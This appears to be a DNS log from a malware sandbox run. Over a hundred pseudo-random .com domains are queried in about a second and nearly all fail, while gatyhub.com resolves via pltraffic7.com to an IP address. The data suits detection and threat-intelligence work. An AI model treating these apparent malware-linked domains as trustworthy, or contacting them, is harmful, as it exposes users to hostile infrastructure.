Aug 23, 2024 18:43:28.623368025 CEST	1.1.1.1	192.168.2.5	0x20bb	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:43:28.623368025 CEST	1.1.1.1	192.168.2.5	0x20bb	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.716614008 CEST	1.1.1.1	192.168.2.5	0xf99c	Name error (3)	gahyraw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.717103004 CEST	1.1.1.1	192.168.2.5	0x307e	Name error (3)	lyrygyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.717700958 CEST	1.1.1.1	192.168.2.5	0x508e	Name error (3)	qegyrol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.718715906 CEST	1.1.1.1	192.168.2.5	0x623f	Name error (3)	gacycus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.718797922 CEST	1.1.1.1	192.168.2.5	0x48ca	Name error (3)	lygywor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.719250917 CEST	1.1.1.1	192.168.2.5	0xda6	Name error (3)	qexyxuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720453978 CEST	1.1.1.1	192.168.2.5	0xcbc9	Name error (3)	gaqyfah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720623970 CEST	1.1.1.1	192.168.2.5	0x9c7e	Name error (3)	pufywil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721915007 CEST	1.1.1.1	192.168.2.5	0x3ab	Name error (3)	volyzef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.722074032 CEST	1.1.1.1	192.168.2.5	0xb06b	Name error (3)	pumydoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.722193003 CEST	1.1.1.1	192.168.2.5	0x6da7	Name error (3)	puzyxyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.722251892 CEST	1.1.1.1	192.168.2.5	0x3196	Name error (3)	qebysul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.722625017 CEST	1.1.1.1	192.168.2.5	0xdab4	Name error (3)	galyzeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.723254919 CEST	1.1.1.1	192.168.2.5	0x2690	Name error (3)	lykylan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.723483086 CEST	1.1.1.1	192.168.2.5	0xb49c	Name error (3)	qekylag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.725760937 CEST	1.1.1.1	192.168.2.5	0x93c7	Name error (3)	vonydik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.726412058 CEST	1.1.1.1	192.168.2.5	0x2a3a	Name error (3)	vocypyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.726480007 CEST	1.1.1.1	192.168.2.5	0x7a41	Name error (3)	qexytep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.726675034 CEST	1.1.1.1	192.168.2.5	0x4c50	Name error (3)	qegykiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.727667093 CEST	1.1.1.1	192.168.2.5	0x70c2	Name error (3)	vowybof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.727868080 CEST	1.1.1.1	192.168.2.5	0x6c25	Name error (3)	pufyjuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.730788946 CEST	1.1.1.1	192.168.2.5	0xecc1	Name error (3)	lyxyxyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.731102943 CEST	1.1.1.1	192.168.2.5	0x291	Name error (3)	lymyvin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.731602907 CEST	1.1.1.1	192.168.2.5	0xc970	Name error (3)	ganycuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.731770039 CEST	1.1.1.1	192.168.2.5	0x7ca7	Name error (3)	galyros.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.732007980 CEST	1.1.1.1	192.168.2.5	0xacdd	Name error (3)	pumycug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.732147932 CEST	1.1.1.1	192.168.2.5	0xe6c5	Name error (3)	qebyxyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.732264042 CEST	1.1.1.1	192.168.2.5	0x82a0	Name error (3)	puzytap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.733098984 CEST	1.1.1.1	192.168.2.5	0x8265	Name error (3)	pupygel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.733153105 CEST	1.1.1.1	192.168.2.5	0x5aab	Name error (3)	lykywid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.733676910 CEST	1.1.1.1	192.168.2.5	0xfb00	Name error (3)	qekyrov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.734998941 CEST	1.1.1.1	192.168.2.5	0xa3b4	Name error (3)	lysyger.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.739207029 CEST	1.1.1.1	192.168.2.5	0x77aa	Name error (3)	purygeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.740609884 CEST	1.1.1.1	192.168.2.5	0x7e58	Name error (3)	vowygem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.741439104 CEST	1.1.1.1	192.168.2.5	0x4670	Name error (3)	qeqyfaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.743143082 CEST	1.1.1.1	192.168.2.5	0x1250	Name error (3)	vocycuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.743707895 CEST	1.1.1.1	192.168.2.5	0x16e4	Name error (3)	gadyquz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.743998051 CEST	1.1.1.1	192.168.2.5	0xc2d3	Name error (3)	lysymux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.744051933 CEST	1.1.1.1	192.168.2.5	0x70ac	Name error (3)	qedyqup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.744388103 CEST	1.1.1.1	192.168.2.5	0xf720	Name error (3)	pujylog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.744472980 CEST	1.1.1.1	192.168.2.5	0x5f54	Name error (3)	ganydiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.744858027 CEST	1.1.1.1	192.168.2.5	0xa550	Name error (3)	vopymyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.745789051 CEST	1.1.1.1	192.168.2.5	0x2e22	Name error (3)	lyvysur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.745799065 CEST	1.1.1.1	192.168.2.5	0xda18	Name error (3)	pupymyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.745806932 CEST	1.1.1.1	192.168.2.5	0x161e	Name error (3)	qetynev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.745815992 CEST	1.1.1.1	192.168.2.5	0xfaa1	Name error (3)	puvypul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.747164965 CEST	1.1.1.1	192.168.2.5	0xf97c	Name error (3)	lyrynad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.747339010 CEST	1.1.1.1	192.168.2.5	0xc46b	Name error (3)	gatynes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.747582912 CEST	1.1.1.1	192.168.2.5	0xee8e	Name error (3)	vojykom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.750075102 CEST	1.1.1.1	192.168.2.5	0x6ac5	Name error (3)	gaqyvob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.751315117 CEST	1.1.1.1	192.168.2.5	0x86b8	Name error (3)	lyxytex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.751913071 CEST	1.1.1.1	192.168.2.5	0x4976	Name error (3)	vofyjuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.753123999 CEST	1.1.1.1	192.168.2.5	0x4645	Name error (3)	qedyhyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.753231049 CEST	1.1.1.1	192.168.2.5	0x5a35	Name error (3)	volyrac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.754549980 CEST	1.1.1.1	192.168.2.5	0x2947	Name error (3)	gadyhyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.756989002 CEST	1.1.1.1	192.168.2.5	0x6468	Name error (3)	vopygat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.871268988 CEST	1.1.1.1	192.168.2.5	0x6a9c	Name error (3)	lymyfoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.875015974 CEST	1.1.1.1	192.168.2.5	0x96ce	Name error (3)	qeqyvig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.876198053 CEST	1.1.1.1	192.168.2.5	0xb215	Name error (3)	lygyjuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.882186890 CEST	1.1.1.1	192.168.2.5	0xf9c6	Name error (3)	purybav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.883219957 CEST	1.1.1.1	192.168.2.5	0x24a3	Name error (3)	gahykih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.883471012 CEST	1.1.1.1	192.168.2.5	0x3e84	Name error (3)	gacypyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.888191938 CEST	1.1.1.1	192.168.2.5	0xbaf3	Name error (3)	vonycum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.892077923 CEST	1.1.1.1	192.168.2.5	0xdeb5	Name error (3)	vofyqit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.903872013 CEST	1.1.1.1	192.168.2.5	0xfd9f	Name error (3)	pujywiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.905376911 CEST	1.1.1.1	192.168.2.5	0x9707	Name error (3)	lyvyxyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906554937 CEST	1.1.1.1	192.168.2.5	0x5fd9	Name error (3)	vojyquf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907824039 CEST	1.1.1.1	192.168.2.5	0xfb91	Name error (3)	qetyfop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907900095 CEST	1.1.1.1	192.168.2.5	0xb714	Name error (3)	vocyzek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.908039093 CEST	1.1.1.1	192.168.2.5	0xf7e8	Name error (3)	lyryfox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.908610106 CEST	1.1.1.1	192.168.2.5	0x83e2	Name error (3)	gacyzaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910089970 CEST	1.1.1.1	192.168.2.5	0x5b8a	Name error (3)	purydip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910124063 CEST	1.1.1.1	192.168.2.5	0x77d9	Name error (3)	vowydic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910177946 CEST	1.1.1.1	192.168.2.5	0x3729	Name error (3)	pufymyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910996914 CEST	1.1.1.1	192.168.2.5	0x258f	Name error (3)	lyxylor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911060095 CEST	1.1.1.1	192.168.2.5	0xe06f	Name error (3)	vofymem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911210060 CEST	1.1.1.1	192.168.2.5	0x381f	Name error (3)	gaqydus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.912230968 CEST	1.1.1.1	192.168.2.5	0xd3c2	Name error (3)	puzylol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.912436008 CEST	1.1.1.1	192.168.2.5	0x1cb9	Name error (3)	qeqysuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.914455891 CEST	1.1.1.1	192.168.2.5	0x2d07	Name error (3)	lymysud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.915445089 CEST	1.1.1.1	192.168.2.5	0x389a	Name error (3)	puvyxeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.916116953 CEST	1.1.1.1	192.168.2.5	0x2583	Name error (3)	gadyneh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.916199923 CEST	1.1.1.1	192.168.2.5	0x8e3a	Name error (3)	galykiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.917051077 CEST	1.1.1.1	192.168.2.5	0x283e	Name error (3)	qedynaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.917799950 CEST	1.1.1.1	192.168.2.5	0x2945	Name error (3)	pujyjup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.918479919 CEST	1.1.1.1	192.168.2.5	0x4be4	Name error (3)	lyryvur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.918648958 CEST	1.1.1.1	192.168.2.5	0x7837	Name error (3)	vocyrom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.918694973 CEST	1.1.1.1	192.168.2.5	0xeade	Name error (3)	puvytag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.918731928 CEST	1.1.1.1	192.168.2.5	0x819c	Name error (3)	pupyboq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.919353008 CEST	1.1.1.1	192.168.2.5	0xd172	Name error (3)	vojyjyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.919646025 CEST	1.1.1.1	192.168.2.5	0x3dc2	Name error (3)	lyvytan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.919723988 CEST	1.1.1.1	192.168.2.5	0xb9d5	Name error (3)	qebyteg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920171022 CEST	1.1.1.1	192.168.2.5	0x32be	Name error (3)	qetyvil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920690060 CEST	1.1.1.1	192.168.2.5	0x440b	Name error (3)	puzywuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920733929 CEST	1.1.1.1	192.168.2.5	0x1845	Name error (3)	gacyroh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920804024 CEST	1.1.1.1	192.168.2.5	0xa17e	Name error (3)	purycul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920908928 CEST	1.1.1.1	192.168.2.5	0x79d4	Name error (3)	qexyriq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920919895 CEST	1.1.1.1	192.168.2.5	0x77ce	Name error (3)	gaqycyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.920931101 CEST	1.1.1.1	192.168.2.5	0x1645	Name error (3)	vowycut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.921559095 CEST	1.1.1.1	192.168.2.5	0x86b1	Name error (3)	pumyxep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.921571016 CEST	1.1.1.1	192.168.2.5	0xdb9f	Name error (3)	galyquw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.922074080 CEST	1.1.1.1	192.168.2.5	0x3178	Name error (3)	gadyfob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.922178030 CEST	1.1.1.1	192.168.2.5	0xc8fc	Name error (3)	vonyzac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.922894955 CEST	1.1.1.1	192.168.2.5	0x9726	Name error (3)	pufygav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.926592112 CEST	1.1.1.1	192.168.2.5	0x235e	Name error (3)	gatyfaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.927685976 CEST	1.1.1.1	192.168.2.5	0x7629	Name error (3)	gahyqub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.928200960 CEST	1.1.1.1	192.168.2.5	0x4a41	Name error (3)	qedyfog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.930951118 CEST	1.1.1.1	192.168.2.5	0x5a74	Name error (3)	qexylal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.930959940 CEST	1.1.1.1	192.168.2.5	0xb27d	Name error (3)	lygymyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.935254097 CEST	1.1.1.1	192.168.2.5	0x42b2	Name error (3)	qegyqug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.937027931 CEST	1.1.1.1	192.168.2.5	0x2d2b	Name error (3)	pumypyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.937062979 CEST	1.1.1.1	192.168.2.5	0x2c87	Name error (3)	vonypyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.938060999 CEST	1.1.1.1	192.168.2.5	0x1a6f	Name error (3)	lykyjux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.938167095 CEST	1.1.1.1	192.168.2.5	0xed80	Name error (3)	lysynaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.939002037 CEST	1.1.1.1	192.168.2.5	0xa676	Name error (3)	vopybok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.940399885 CEST	1.1.1.1	192.168.2.5	0x79a8	Name error (3)	qegyhev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.940588951 CEST	1.1.1.1	192.168.2.5	0xf226	Name error (3)	gahyhys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.941098928 CEST	1.1.1.1	192.168.2.5	0xe00a	Name error (3)	vofygaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.941183090 CEST	1.1.1.1	192.168.2.5	0x3157	Name error (3)	ganypeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.941193104 CEST	1.1.1.1	192.168.2.5	0xc118	Name error (3)	lygyged.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.942490101 CEST	1.1.1.1	192.168.2.5	0x98e4	Name error (3)	qeqyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.942711115 CEST	1.1.1.1	192.168.2.5	0x5283	Name error (3)	qekykup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.942948103 CEST	1.1.1.1	192.168.2.5	0x8c8a	Name error (3)	volykit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.943166018 CEST	1.1.1.1	192.168.2.5	0x769d	Name error (3)	gatyviw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.943634033 CEST	1.1.1.1	192.168.2.5	0xa9ca	Name error (3)	lysyfin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.943727970 CEST	1.1.1.1	192.168.2.5	0x5e11	Name error (3)	lyxywij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.944268942 CEST	1.1.1.1	192.168.2.5	0x2db1	Name error (3)	volyquk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.947611094 CEST	1.1.1.1	192.168.2.5	0x96fd	Name error (3)	lymyxex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.959649086 CEST	1.1.1.1	192.168.2.5	0x2397	Name error (3)	qekyqyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.961834908 CEST	1.1.1.1	192.168.2.5	0x2760	Name error (3)	pupydig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.962188005 CEST	1.1.1.1	192.168.2.5	0x16f	Name error (3)	vopydum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.962672949 CEST	1.1.1.1	192.168.2.5	0x4def	Name error (3)	gatyduh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.963434935 CEST	1.1.1.1	192.168.2.5	0xec4f	Name error (3)	qebylov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.963452101 CEST	1.1.1.1	192.168.2.5	0x31b	Name error (3)	lyvylod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.964854002 CEST	1.1.1.1	192.168.2.5	0x7052	Name error (3)	lyrysyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.964930058 CEST	1.1.1.1	192.168.2.5	0x9287	Name error (3)	gahynaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.965135098 CEST	1.1.1.1	192.168.2.5	0xd4b7	Name error (3)	qegynap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.965837955 CEST	1.1.1.1	192.168.2.5	0x44ff	Name error (3)	vocykif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.967520952 CEST	1.1.1.1	192.168.2.5	0xba3f	Name error (3)	lygynox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.968542099 CEST	1.1.1.1	192.168.2.5	0x2199	Name error (3)	pufybop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.969125986 CEST	1.1.1.1	192.168.2.5	0x55bb	Name error (3)	vowypek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.970236063 CEST	1.1.1.1	192.168.2.5	0x8b8d	Name error (3)	gaqypew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.971318007 CEST	1.1.1.1	192.168.2.5	0xf241	Name error (3)	lyxyjun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.971896887 CEST	1.1.1.1	192.168.2.5	0x75d7	Name error (3)	lymytar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.972440004 CEST	1.1.1.1	192.168.2.5	0x4f0f	Name error (3)	puzyjyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.975130081 CEST	1.1.1.1	192.168.2.5	0x1e4a	Name error (3)	qedyvuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.979876995 CEST	1.1.1.1	192.168.2.5	0x22c4	Name error (3)	pupycuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.980093002 CEST	1.1.1.1	192.168.2.5	0xde02	Name error (3)	ganyriz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.981096983 CEST	1.1.1.1	192.168.2.5	0x302	Name error (3)	ganyzas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.981362104 CEST	1.1.1.1	192.168.2.5	0xcf2a	Name error (3)	vojygok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.982150078 CEST	1.1.1.1	192.168.2.5	0x67d9	Name error (3)	galyheh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.982161045 CEST	1.1.1.1	192.168.2.5	0x3f28	Name error (3)	puvywup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.982467890 CEST	1.1.1.1	192.168.2.5	0x12d2	Name error (3)	lyryxen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.982956886 CEST	1.1.1.1	192.168.2.5	0x848d	Name error (3)	lykymyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.983119965 CEST	1.1.1.1	192.168.2.5	0x149	Name error (3)	vocyquc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.983812094 CEST	1.1.1.1	192.168.2.5	0xa628	Name error (3)	vojymet.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.983846903 CEST	1.1.1.1	192.168.2.5	0x9a4d	Name error (3)	puryxag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.984105110 CEST	1.1.1.1	192.168.2.5	0x6018	Name error (3)	qegyfil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.984147072 CEST	1.1.1.1	192.168.2.5	0x6f7e	Name error (3)	puvyliv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.984586954 CEST	1.1.1.1	192.168.2.5	0xbb29	Name error (3)	qexyqyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.985101938 CEST	1.1.1.1	192.168.2.5	0xbf4f	Name error (3)	pufydul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.985619068 CEST	1.1.1.1	192.168.2.5	0xfaf	Name error (3)	lyxymed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.986051083 CEST	1.1.1.1	192.168.2.5	0xa9fc	Name error (3)	qeqyloq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.986414909 CEST	1.1.1.1	192.168.2.5	0x4d94	Name error (3)	gaqyzoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.987245083 CEST	1.1.1.1	192.168.2.5	0x6f7d	Name error (3)	puzymev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.987658024 CEST	1.1.1.1	192.168.2.5	0x63ae	Name error (3)	pumytol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.989011049 CEST	1.1.1.1	192.168.2.5	0x5e42	Name error (3)	pujymel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.989021063 CEST	1.1.1.1	192.168.2.5	0xc5c1	Name error (3)	qetysuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.989403009 CEST	1.1.1.1	192.168.2.5	0xa73f	Name error (3)	qexykug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.991101027 CEST	1.1.1.1	192.168.2.5	0x6465	Name error (3)	gacykub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.991266966 CEST	1.1.1.1	192.168.2.5	0xcc9c	Name error (3)	qeqytal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.992650032 CEST	1.1.1.1	192.168.2.5	0xe1a0	Name error (3)	volyjym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.996824026 CEST	1.1.1.1	192.168.2.5	0xa3e6	Name error (3)	vofybic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.000560999 CEST	1.1.1.1	192.168.2.5	0xa302	Name error (3)	qekyheq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.000884056 CEST	1.1.1.1	192.168.2.5	0x4c32	Name error (3)	vonyrot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.001144886 CEST	1.1.1.1	192.168.2.5	0x9f25	Name error (3)	vopycyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.001205921 CEST	1.1.1.1	192.168.2.5	0x5193	Name error (3)	lykygaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.001396894 CEST	1.1.1.1	192.168.2.5	0xc89c	Name error (3)	lyvywux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:30.002758026 CEST	1.1.1.1	192.168.2.5	0xf80f	Name error (3)	gahyfow.com	none	none	A (IP address)	IN (0x0001)	false
